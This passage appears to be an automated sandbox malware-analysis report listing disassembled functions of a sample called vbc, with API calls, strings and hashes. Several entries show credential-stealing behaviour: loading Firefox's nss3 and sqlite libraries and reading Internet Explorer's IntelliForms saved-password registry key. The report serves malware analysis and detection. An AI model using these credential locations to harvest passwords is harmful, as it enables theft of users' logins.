                                                                                                                                                    • Opcode ID: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                                                                                                                    • Instruction ID: dc7e95600dee0bf6daca19896d95929b9e7fb1f9fe7c184dfd563e32ea829a14
                                                                                                                                                    • Opcode Fuzzy Hash: 60c968a06818d841dc3f94f16557b2d6df9d0dbd22d8837fd1ebe6fbdb2c419c
                                                                                                                                                    • Instruction Fuzzy Hash: 8501D1B67502117BE3111FB49C89B6B7EACDB42F4BB100139B502F2280DBB8CF05869C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FABA Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 32COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAC9
                                                                                                                                                    • GetModuleHandleW.KERNEL32(sqlite3.dll,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAD2
                                                                                                                                                    • GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FADB
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAEA
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF1
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,751457F0,0040FC10,?,?,?,?,?,00000000), ref: 0040FAF8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHandleLibraryModule
                                                                                                                                                    • String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
                                                                                                                                                    • API String ID: 662261464-3550686275
                                                                                                                                                    • Opcode ID: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                                                                                                                    • Instruction ID: c5d69885cf2e3d5474ff6b38c23ba8038bf1212ac087c8b68f6824d90ef94812
                                                                                                                                                    • Opcode Fuzzy Hash: d0d754f8fa980613d90b85c052ffa4ec5d0d6696dd4c8834489f6bf69c2357b0
                                                                                                                                                    • Instruction Fuzzy Hash: 1AE0D816B0132E669E2067F16C44D1B7E5CC892AE53150037A904A32408DEC5C0599F8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00441FDC Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$memchrmemset
                                                                                                                                                    • String ID: G"D$G"D
                                                                                                                                                    • API String ID: 1581201632-2001841848
                                                                                                                                                    • Opcode ID: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                                                                                                                    • Instruction ID: 18be241936230d761fb3e4c1ab226db0ef0f42d77396bda2a3194a4a2a5a8e65
                                                                                                                                                    • Opcode Fuzzy Hash: 7575a319fd1e5a0cf748581ae524368e3baf011f309bc42e4df5649906151b93
                                                                                                                                                    • Instruction Fuzzy Hash: CE51E671900219ABDB10EF65CD85EEEB7BCAF44304F44446BFA49D7141E778EA48CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407890 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemMetrics.USER32 ref: 004078A9
                                                                                                                                                    • GetSystemMetrics.USER32 ref: 004078AF
                                                                                                                                                    • GetDC.USER32(00000000), ref: 004078BC
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004078CD
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004078D4
                                                                                                                                                    • ReleaseDC.USER32 ref: 004078DB
                                                                                                                                                    • GetWindowRect.USER32 ref: 004078EE
                                                                                                                                                    • GetParent.USER32(?), ref: 004078F3
                                                                                                                                                    • GetWindowRect.USER32 ref: 00407910
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040796F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2163313125-0
                                                                                                                                                    • Opcode ID: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                                                                                                                    • Instruction ID: 40da1e460122d0dbc2375826a99d02d2520f98ce936ed6642694246a0da552c1
                                                                                                                                                    • Opcode Fuzzy Hash: 27c47932f92ae397c529d5322f361d1abbe154fe8b4fd6afae4dd3e0e48430fe
                                                                                                                                                    • Instruction Fuzzy Hash: D3318176A00209AFDB04DFB8CC85AEEBBB9FB48351F150175E901F3290DA70AE418B50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040684F Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 96stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00406878
                                                                                                                                                    • memset.MSVCRT ref: 0040688C
                                                                                                                                                    • strcpy.MSVCRT(?), ref: 004068A6
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,?,?), ref: 004068EB
                                                                                                                                                    • strcpy.MSVCRT(?,00001000,?,?,?,?,?,?), ref: 004068FF
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?), ref: 00406912
                                                                                                                                                    • wcscpy.MSVCRT ref: 00406921
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 00406948
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,Rp@,00406D64), ref: 0040695E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                    • String ID: Rp@
                                                                                                                                                    • API String ID: 4248099071-3382320042
                                                                                                                                                    • Opcode ID: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                                                                                                                    • Instruction ID: 073529020724e05d4964247b7c64433db30515fb9166064be710f6d7ccb76f44
                                                                                                                                                    • Opcode Fuzzy Hash: 671e59c8fe4c17755a702227dbfb0f671c225521712c780855f09c1fc1980107
                                                                                                                                                    • Instruction Fuzzy Hash: 653141B290011DBFDB20DA55CC84FEA77BCFF09358F0445AAB919E3141DA74AA588F68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00402B99 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3592753638-3916222277
                                                                                                                                                    • Opcode ID: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
                                                                                                                                                    • Instruction ID: 27dbad6a18cb5119fe9557e6abee58e32c1211c22f38b2cca10356837960f856
                                                                                                                                                    • Opcode Fuzzy Hash: a6abcb691fd1dabd2973f99fa54c7fcc296b45a854174555a7bdb068922a3314
                                                                                                                                                    • Instruction Fuzzy Hash: DA615770C0811AEBEF189F95E6895AEB771FF04305F60847FE442B62E0DBB84981CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A818 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadMenuW.USER32 ref: 0040A83F
                                                                                                                                                      • Part of subcall function 0040A668: GetMenuItemCount.USER32 ref: 0040A67E
                                                                                                                                                      • Part of subcall function 0040A668: memset.MSVCRT ref: 0040A69D
                                                                                                                                                      • Part of subcall function 0040A668: GetMenuItemInfoW.USER32 ref: 0040A6D9
                                                                                                                                                      • Part of subcall function 0040A668: wcschr.MSVCRT ref: 0040A6F1
                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 0040A85D
                                                                                                                                                    • CreateDialogParamW.USER32 ref: 0040A8AB
                                                                                                                                                    • memset.MSVCRT ref: 0040A8C7
                                                                                                                                                    • GetWindowTextW.USER32 ref: 0040A8DC
                                                                                                                                                    • EnumChildWindows.USER32 ref: 0040A907
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040A90E
                                                                                                                                                      • Part of subcall function 0040A497: _snwprintf.MSVCRT ref: 0040A4BC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
                                                                                                                                                    • String ID: caption
                                                                                                                                                    • API String ID: 1928666178-4135340389
                                                                                                                                                    • Opcode ID: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                                                                                                                    • Instruction ID: 1ee1ed61ad6e464c94b1b5c04ceaba47984998c4c5bccbb9cf540d7a9e91c68f
                                                                                                                                                    • Opcode Fuzzy Hash: 2a735e7d3e9f25f5000f535f47a02417f98db50f76fb95be89fb06d3c5800170
                                                                                                                                                    • Instruction Fuzzy Hash: 4C21B472100314BBDB11AF50DC49BAF3B78FF45751F148436F905A5191D7788AA0CB6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407CFE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                    • String ID: %s (%s)$G@
                                                                                                                                                    • API String ID: 3979103747-4021399728
                                                                                                                                                    • Opcode ID: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                                                                                                                    • Instruction ID: 7020ae682d4dad294ec7254b180182bae2c538f47323e789ebcab58d633c0506
                                                                                                                                                    • Opcode Fuzzy Hash: f04d55ffe867956f13ff29a0b22ee26a635b57cfc1c306c95c53cfde12d0b5a1
                                                                                                                                                    • Instruction Fuzzy Hash: 58215E72900219BBDF21DF95CD4599BB7B8BF04358F40846AF948AB201EB74EA188BD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004070BF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 004070E4
                                                                                                                                                    • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE), ref: 00407102
                                                                                                                                                    • wcslen.MSVCRT ref: 0040710F
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040711F
                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004071E5,?,00000000,?,0040C6FE,00000000), ref: 00407129
                                                                                                                                                    • wcscpy.MSVCRT ref: 00407139
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                    • API String ID: 2767993716-572158859
                                                                                                                                                    • Opcode ID: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                                                                                                                    • Instruction ID: 89f566b746906e4e3228774242dd749435861e54522ca67c51f24cfbd45377e0
                                                                                                                                                    • Opcode Fuzzy Hash: 26114b79388437db0e90dde86d0aa8455aeff93cef19d95b112ae8d9efa36594
                                                                                                                                                    • Instruction Fuzzy Hash: 2301F231A08114BBEB145B61EC46E9FBB68EB05BA1F20007AF606F41D0DEB96F00969C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A97E Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407548: GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A998
                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A9A8
                                                                                                                                                    • GetPrivateProfileIntW.KERNEL32 ref: 0040A9B9
                                                                                                                                                      • Part of subcall function 0040A51E: GetPrivateProfileStringW.KERNEL32 ref: 0040A53A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                    • API String ID: 3176057301-2039793938
                                                                                                                                                    • Opcode ID: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                                                                                                                    • Instruction ID: f715108fd1d236bc9ad6a323193eaeb919362f53399fbb1b2bc2ef5a739791b1
                                                                                                                                                    • Opcode Fuzzy Hash: 1673debe331e7a8ca134e50d5334904a3cc19ce9f9385a73b99b164dd8d493e6
                                                                                                                                                    • Instruction Fuzzy Hash: 33F0CD22EC035536E61176221D07F3E25088BA1B66F95447FBD08BA2D3DE7C4A14869E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0042CD7E Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 245COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • unable to open database: %s, xrefs: 0042CFD5
                                                                                                                                                    • out of memory, xrefs: 0042CFEC
                                                                                                                                                    • database is already attached, xrefs: 0042CEA8
                                                                                                                                                    • database %s is already in use, xrefs: 0042CE4F
                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042CDD7
                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042CEF6
                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042CDED
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                    • Opcode ID: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                                                                                                                    • Instruction ID: 266062839a895961ad217d8ef2c4278de09ba8d71166d49c3bc68db0563119ae
                                                                                                                                                    • Opcode Fuzzy Hash: 9031da780ff69da590ffb3ad1101421015f0ee0ff19cf333b8a9ef6fce115eea
                                                                                                                                                    • Instruction Fuzzy Hash: BE91C171B00315AFDB20DF69D981B9EBBF1AF04308F64845FE8159B282D778EA41CB59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040AFDA Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADC7
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADD5
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADE6
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040ADFD
                                                                                                                                                      • Part of subcall function 0040ADBB: ??3@YAXPAX@Z.MSVCRT ref: 0040AE06
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B01A
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B036
                                                                                                                                                    • memcpy.MSVCRT ref: 0040B05B
                                                                                                                                                    • memcpy.MSVCRT ref: 0040B06F
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B0F2
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B0FC
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040B134
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                                                                                                      • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                                                                                                                      • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                                                                                                      • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                                                                                                      • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                    • String ID: ($d
                                                                                                                                                    • API String ID: 1140211610-1915259565
                                                                                                                                                    • Opcode ID: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                                                                                                                    • Instruction ID: 8a5fa3be38e8e11f26e8e9502e5dff09d3bfeaf4ce2a81799fe883ad29a31388
                                                                                                                                                    • Opcode Fuzzy Hash: 5dcfa6d27d7cd3b1b3e4f808df3914de81461d1c90a1f760cbfea76231314b4a
                                                                                                                                                    • Instruction Fuzzy Hash: 50517872601700AFE728DF2AC586A5AB7E4FF48358F10852EE55ACB791DB74E940CB48
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004150B6 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 0041510E
                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00415118
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041512A
                                                                                                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 00415202
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3015003838-0
                                                                                                                                                    • Opcode ID: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                                                                                                                    • Instruction ID: 880e68434f8ef122057b7821066ce039c6a6aeb50982fb6198a036ab3cbbf4dd
                                                                                                                                                    • Opcode Fuzzy Hash: 9f8ed0d04d3051dd5d2585b6ab40f83052c279f07ad27e494029b12bda0602be
                                                                                                                                                    • Instruction Fuzzy Hash: 7641F379504B42EFE3228F219C05BEBB7E0EFC0B15F20492FF59556240CBB9D9858E1A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415D4D Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415D77
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 00415D7E
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00415D8B
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00415DA0
                                                                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045162C,00415469,00000000,?,00000000,00000000), ref: 00415DA9
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00415DB0
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00415DBD
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00415DD2
                                                                                                                                                    • free.MSVCRT(00000000), ref: 00415DDB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2802642348-0
                                                                                                                                                    • Opcode ID: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                                                                                                                    • Instruction ID: 389b81331b8195f66de6fade72418799adbb9e1ccdce19076b3e4dce97b88e29
                                                                                                                                                    • Opcode Fuzzy Hash: 6ec6a6250f4bc7cdf171a96923757e46c1f9deb9adab3d10569e0c4ca2454acf
                                                                                                                                                    • Instruction Fuzzy Hash: 13118A39500E10DBC6203B747C8D6FF36249BD7B37B21832BF963952D1DA5948C2566A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004124C0 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                    • Opcode ID: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                                                                                                                    • Instruction ID: 1d27d4cf7977f40543be0eb13b72094ec5c0409efe485552fd301264f6eb4def
                                                                                                                                                    • Opcode Fuzzy Hash: 449b515319a675a2a0fe7de20888cf946b50a79f9f1d785cd6ce0af7e4c5c8d6
                                                                                                                                                    • Instruction Fuzzy Hash: 570145B6E54260F2FA3024058EE6FF30145CB62754FA40027F88AA02C0A1CD0EE3A29F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409657 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                                                                                                      • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                                                                                                                      • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
                                                                                                                                                    • memset.MSVCRT ref: 004096C7
                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                                                                                                                    • _wcsupr.MSVCRT ref: 0040970F
                                                                                                                                                      • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                                                                                                                      • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                                                                                                                      • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                                                                                                                      • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                                                                                                                    • memset.MSVCRT ref: 0040975E
                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 00409796
                                                                                                                                                    Strings
                                                                                                                                                    • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00409674
                                                                                                                                                    Memory Dump Source
